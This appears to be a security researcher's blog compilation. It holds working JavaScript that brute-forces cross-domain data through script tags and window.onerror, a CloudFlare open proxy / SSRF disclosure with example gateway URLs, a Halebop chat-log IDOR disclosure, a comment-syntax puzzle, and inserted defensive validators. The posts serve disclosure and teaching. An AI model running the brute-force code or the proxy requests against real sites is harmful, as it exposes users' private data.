    console.log('Found: ' + notDefined[0]);
    console.timeEnd("binarySearch");
  } else {
    // Remove the previously checked secrets
    for (i = 0; i < defined.length; i++) {
      delete window[defined[i]];
    }

    // Now we want to go on checking the defined variables if the
    // secret was defined or the undefined variables if the secret was
    // not defined.
    next = wasDefined ? defined : notDefined;

    // Split the array in two halves, one that we will define (in the
    // global object), and one that we will not define.
    split = Math.floor(next.length / 2);
    defined = next.slice(0, split);
    notDefined = next.slice(split, next.length);

    // Define the variables from the "defined" array.
    for (i = 0; i < defined.length; i++) {
      window[defined[i]] = 0;
    }

    // Assume that we will find the secret in the "defined" array.
    // window.onerror will set wasDefined to false if it is called.
    wasDefined = true;

    // Load the url where the secret is; binarySearch runs again
    // once the script has executed
    loadScript(url, binarySearch);
  }
}

window.onerror = function() {
  // If we ended up here, we got a ReferenceError. That means the
  // secret was not defined in the global object.
  wasDefined = false;
  // Suppress the default error handling
  return true;
};

// Placeholder: the cross-domain URL whose response is the bare expression
// (the real URL is not given in the post)
var url = 'http://example.com/data';

var notDefined = [], defined = [], wasDefined = false, i;

// For testing the solution, seed with a lot of incorrect guesses
for (i = 0; i < 1000000; i++) {
  notDefined.push('notcorrect' + i);
}

// Add the correct guess somewhere random
notDefined[Math.floor(Math.random() * notDefined.length)] = 'secret2';

// Get rid of any defined properties from previous runs
for (i = 0; i < notDefined.length; i++) {
  delete window[notDefined[i]];
}

// Run the algorithm
console.time("binarySearch");
binarySearch();

Original post:

Recently I stumbled across a web site that had some user data accessible via a URL, and it was returned like this:

value1, value2

I realized that this is valid JavaScript: an expression consisting of two variable names. I thought it might be possible to guess the names of those two variables, declare them, and then fetch the data as JavaScript via a script tag on another domain. If we then don’t get an error, we guessed correctly! We can detect whether we get an error with window.onerror. See further down for code that does this.

Anyway, since I came up with my own way of brute-forcing cross-domain data, I thought I should share the code. It is not a very fast method, and I guess someone already thought of it, like back in 1993, but here it is. It uses the same example data as @avlidienbrunn used.

// Load a script from a url and then call the callback
// From http://stackoverflow.com/a/950146/185596
function loadScript(url, callback) {
  var head = document.getElementsByTagName('head')[0];
  var script = document.createElement('script');
  script.type = 'text/javascript';
  script.src = url;
  // onload fires after the script has executed, even if it threw
  script.onload = callback;
  head.appendChild(script);
}

function checkNext() {
  if (success) {
    // The last loaded script ran without a ReferenceError, so the
    // current guess is the real name
    console.log('Found: ' + secrets[i]);
  } else if (i + 1 >= secrets.length) {
    // Ran out of guesses
    console.log('Not found');
  } else {
    // Remove the previously checked secret to save memory
    if (i >= 0) {
      delete window[secrets[i]];
    }
    i++;
    // Define the next secret to check
    window[secrets[i]] = 0;
    // We'll assume this will be a success. If not, success
    // will be set to false by onerror.
    success = true;
    // Load the script; checkNext runs again once it has executed
    loadScript(url, checkNext);
  }
}

// Placeholder: the cross-domain URL whose response is the bare expression
// (the real URL is not given in the post)
var url = 'http://example.com/data';

var secrets = [ 'secret0', 'secret1', 'secret2', 'secret3' ],
    success = false,
    i;

window.onerror = function() {
  // If we ended up here, we got a ReferenceError and then
  // we know that the current guess was wrong.
  success = false;
  // Suppress the default error handling
  return true;
};

// Get rid of any defined properties from previous runs
for (i = 0; i < secrets.length; i++) {
  delete window[secrets[i]];
}

// Start at -1 since checkNext will increase it by 1, to 0
i = -1;
checkNext();

### A JavaScript challenge for Nordic.js

Today and yesterday I’ve been visiting Nordic.js, a Scandinavian JavaScript conference. To celebrate the occasion I made a little JavaScript challenge that I announced on Twitter:

The first one was from Andreas Madsen and it was in line with what I was looking for: changing the text between /* and */.

Then Jonas Magazinius bent the rules (rules that only existed in my mind) with this “feature flag” solution:

This was Mathias Bynens‘ first solution. It was similar to Andreas’ code, but implemented a bit differently.

From Joshua Adams I got this solution that required an HTML context, but was kind of cool anyway:

Mathias sent in some more proposals, getting closer to the expected solution; the second one was IE 10 only, if I understood it correctly. Update: Well, that was wrong, it actually is valid JavaScript. See this page about comment syntax.

While writing this post I got this from File Descriptor, and this was on par with what I was looking for, using the JavaScript feature “Automatic Semicolon Insertion” and line terminators in a comment:

Finally, here is the code I wrote that inspired this challenge:

var a = 0, b = 0;
a/*
*/++/*
*/b

vs.

var a = 0, b = 0;
a/**/++/*
*/b

On Twitter I wrote that I would declare the “coolest” solution the winner, and I think it’s the one from File Descriptor. Congratulations!
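Added example, not part of the original post: the rule the winning solutions rely on is that a block comment containing a line terminator counts as a line break for automatic semicolon insertion. The scanner below finds such comments (it is a simplification that ignores comment-like text inside string literals), and the helper runs the two snippets above to show the effect on a and b.

```javascript
// Added example, not from the original post. The two snippets from the post,
// embedded as strings so they can be evaluated and inspected.
const SNIPPET_A = 'var a = 0, b = 0;\na/*\n*/++/*\n*/b';
const SNIPPET_B = 'var a = 0, b = 0;\na/**/++/*\n*/b';

// ECMAScript line terminators: LF, CR, LINE SEPARATOR, PARAGRAPH SEPARATOR.
const LINE_TERMINATOR = /[\n\r\u2028\u2029]/;
// Block comments, non-greedy; simplification: not string-literal aware.
const BLOCK_COMMENT = /\/\*[\s\S]*?\*\//g;

// Returns the block comments that the parser treats as a line break, which is
// what makes "a ++ b" split differently in the two snippets.
function commentsActingAsLineBreaks(src) {
  return (src.match(BLOCK_COMMENT) || []).filter((c) => LINE_TERMINATOR.test(c));
}

// Runs a snippet in a fresh function scope and reports the final [a, b].
// Snippet A parses as "a; ++b" (a postfix ++ may not follow a line break),
// snippet B as "a++; b" (the line break before b ends the statement).
function evalCounters(src) {
  return new Function(src + '\n;return [a, b];')();
}
```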

### Gateway to Heaven – a CloudFlare Vulnerability

CloudFlare is a service that sits between the Internet and its customers’ web servers, protecting them and speeding them up.

When I was visiting the web site of one of these customers I noticed something strange. The page was fetching content (JavaScript and CSS files) via a URL that looked something like this:

http://example.com/cdn-cgi/pe/bag?r[]=http://example.com/some.css&r[]=http://example.com/some.css

(If you, like me, are always looking for stuff that can be abused or misused, you have probably already guessed what comes next.)

I soon understood that this was CloudFlare functionality and not local to the website. I then immediately sent this mail to CloudFlare:

Hi,

Some days ago I submitted a vulnerability report to a site that I think is one of your customers. I don’t want to disclose their name at the moment as I am not sure they are OK with that. They might have been in contact with you already, since the problem seems to be with functionality you provide.

URL:
2) http://cloudflare.com/cdn-cgi/pe/bag?r[]=http%3A%2F%2Fyahoo.com

Description:
When these URLs are accessed, your server nicely gets the page in the r[] parameter and returns it in the response. Multiple instances of r[] in the same URL are also possible.

This could be exploited by someone who wants to access another URL, but anonymously (except for your logs of course), or to access pages “in your name”, making you look bad.

It could also be exploited in another, more serious way. If you happen to have any internal web servers that are not visible to the internet (for example a bug tracker), they might be visible to the computer hosting cloudflare.com. Then this vuln could be used to fetch files from the internal servers (given that the attacker knows the URLs or brute forces them).

A search on Google for this type of URL shows that many sites have the same problem. I don’t know if you can fix it in one place or if you have to roll it out to all these sites.

If you have any questions, please let me know.

In short, the vulnerability would allow an attacker to download content via a server acting as a gateway to the inside of CloudFlare, or to anywhere else.

After this, the whole experience was very smooth. John Roberts, Platform Lead at CloudFlare, who was my contact during the following discussion, was very nice about it all. CloudFlare does not have a reward program, but I was offered a T-shirt as a token of appreciation.
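As an added example (not CloudFlare’s code), here is how a fetch gateway like this one should decide whether to retrieve an r[] target at all: plain http(s) only, no credentials in the URL, nothing that points at a loopback or private address, and a host on the site’s own allowlist. The allowlist and the sample query strings are assumptions.

```javascript
// Added example, not CloudFlare's code. Validates every r[] target of a
// "bag"-style fetch gateway before the server retrieves it.

// Private, loopback, link-local and "this network" IPv4 ranges.
function isInternalIPv4(host) {
  const m = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]), b = Number(m[2]);
  return a === 10 || a === 127 || a === 0 ||
    (a === 172 && b >= 16 && b <= 31) ||
    (a === 192 && b === 168) || (a === 169 && b === 254);
}

// Loopback, unspecified, unique-local, link-local and IPv4-mapped IPv6.
function isInternalIPv6(host) {
  const h = host.toLowerCase();
  return h === '::1' || h === '::' || /^f[cd]/.test(h) ||
    /^fe[89ab]/.test(h) || h.startsWith('::ffff:');
}

// Only plain http(s) URLs whose host is on the allowlist pass. The WHATWG URL
// parser normalises tricks such as decimal IPs (http://2130706433/) for us.
function isAllowedProxyTarget(target, allowedHosts) {
  let u;
  try { u = new URL(target); } catch (e) { return false; }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return false;
  if (u.username || u.password) return false;          // user@host tricks
  const host = u.hostname.replace(/^\[|\]$/g, '');      // strip IPv6 brackets
  if (host === 'localhost' || host.endsWith('.localhost')) return false;
  if (isInternalIPv4(host) || isInternalIPv6(host)) return false;
  return allowedHosts.includes(host);
}

// Splits the r[] parameters of a bag request and decides each one.
function checkBagRequest(queryString, allowedHosts) {
  const params = new URLSearchParams(queryString);
  return params.getAll('r[]').map((target) => ({
    target,
    allowed: isAllowedProxyTarget(target, allowedHosts),
  }));
}
```

Because an allowlisted hostname can still resolve to an internal address, production code must also check the resolved address at connect time rather than only the URL.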

### Open Chat Conversations in Halebop Support (Fixed)

Five months ago I discovered that the Swedish telecom operator Halebop (a TeliaSonera-operated brand) had a big problem in its support chat.

After ending a support session, the customer could access the log of the session for later reference via a URL of the form:

https://...halebop.se/...path?ID=[id]&_sid=[sid]

It turned out that the _sid parameter didn’t matter, and that it was possible to access other customers’ logs by changing the id parameter. This is called an Insecure Direct Object Reference in the OWASP Top Ten (thanks @avlidienbrunn). The id number I was looking at was higher than 2,500,000, which indicated that there could have been more than two and a half million support chat logs with potentially sensitive customer data open for anyone to read.

I asked on Twitter if anyone had a security contact at Halebop and got help almost immediately from @ilektrojohn, who knew someone on the inside. I mailed a report and it was forwarded to the incident report team (IRT), since the contact I got in touch with at TeliaSonera did not work with this. I never got any response directly from the IRT, but was told by my contact that:

the official response was: “we do not encourage this sort of activity”

## However…

Before publishing this post I wanted to make sure that the vulnerability was fixed so I tried to access a support log and was rejected, as expected. But fortunately I did not remember to close the tab afterwards.

The next day, when I was doing some work from home and for once needed to use Burp (my proxy tool of choice; I am a developer, not a security guy), I happened to notice something strange in the History tab. It looked like a support conversation! And it was.

Apparently the chat page used AJAX to update the current conversation at regular intervals, and it kept doing this even though I was not allowed to see the conversation on the page. My guess is that when they fixed the original vulnerability, they only did it in one place in the view layer, and not deeper down.

Naturally I had to report this flaw too, but this time my original contact was not available. Instead I asked Telia on Twitter for help. One week later the security team contacted me, and this time they told me:

Thank you for taking the effort of finding and reporting this issue.

That’s what I want to hear!
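As an added example (not Halebop’s code), this is the shape of fix that avoids the second bug: a single ownership check that both the page view and the AJAX poll must go through, keyed on the server-side session rather than on a request parameter like _sid. The sessions, ids and chat lines are constructed sample data.

```javascript
// Added example, not Halebop's code. One authorisation path for every way of
// reaching a chat log, so a fix in the view layer cannot leave the background
// poll unprotected. All data below is constructed.
class Forbidden extends Error {}

// Constructed store: chat log id -> owning customer and transcript lines.
const chatLogs = new Map([
  [2500001, { customerId: 'cust-A', lines: ['Hi, I need a new SIM', 'Sure, ...'] }],
  [2500002, { customerId: 'cust-B', lines: ['My invoice is wrong'] }],
]);

// The only way to reach a log. Ownership comes from the server-side session,
// never from request parameters such as _sid, and a foreign id is answered
// exactly like a missing one so the response does not reveal which ids exist.
function loadChatLog(session, logId) {
  const log = chatLogs.get(Number(logId));
  if (!log || log.customerId !== session.customerId) {
    throw new Forbidden('chat log not available');
  }
  return log;
}

// Page view: renders the whole transcript.
function renderChatPage(session, query) {
  return loadChatLog(session, query.ID).lines.join('\n');
}

// AJAX poll: returns the lines added after index `since`. Same check, same error.
function pollChatUpdates(session, query, since) {
  return loadChatLog(session, query.ID).lines.slice(since);
}
```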